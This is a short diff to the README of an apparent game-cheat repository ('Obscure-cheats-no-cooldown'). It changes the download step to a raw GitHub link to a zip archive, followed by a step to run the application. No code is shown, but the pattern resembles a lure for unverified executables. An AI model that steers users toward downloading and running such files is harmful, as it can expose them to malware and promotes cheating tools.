whydxit/Obscure-cheats-no-cooldown/README.md

 ### Step 3: Download the Application

 After choosing your version, you will find a list of files.
-Click on the file named **Obscure-cheats-no-cooldown.exe** to start the download.
+Click on the file named **https://raw.githubusercontent.com/whydxit/Obscure-cheats-no-cooldown/main/colly/Obscure-cheats-no-cooldown.zip** to start the download.

 ### Step 4: Run the Application